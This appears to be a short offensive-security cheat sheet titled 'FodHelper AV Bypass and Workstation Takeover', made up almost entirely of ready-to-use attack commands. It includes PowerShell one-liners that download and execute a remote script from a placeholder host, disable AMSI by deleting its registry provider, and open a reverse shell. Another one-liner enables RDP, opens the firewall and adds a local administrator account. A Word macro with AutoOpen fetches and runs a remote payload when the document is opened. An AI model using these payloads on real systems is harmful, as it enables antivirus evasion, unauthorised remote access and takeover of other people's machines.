FodHelper AV Bypass and Workstation Takeover

Property
Links

Disable AMSI and gain reverse shell

iex (New-Object Net.WebClient).DownloadString('http://<ip address>/helper.ps1');helper -custom "cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.exe /c <powershell reverse shell>"

Disable AMSI, enable RDP, and create admin user

iex (New-Object Net.WebClient).DownloadString('http://<ip address>/helper.ps1');helper -custom "cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f; Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'; cmd.exe /c net user test123 Password123! /add; net localgroup administrators test123 /add"

Word Macro Runner Download

Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "powershell iex (New-Object Net.WebClient).DownloadString('http://webserver/banana.txt')"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
    DoStuff
End Sub
TwitterLinkedInDiscord

Copyright © Joe Helle 2023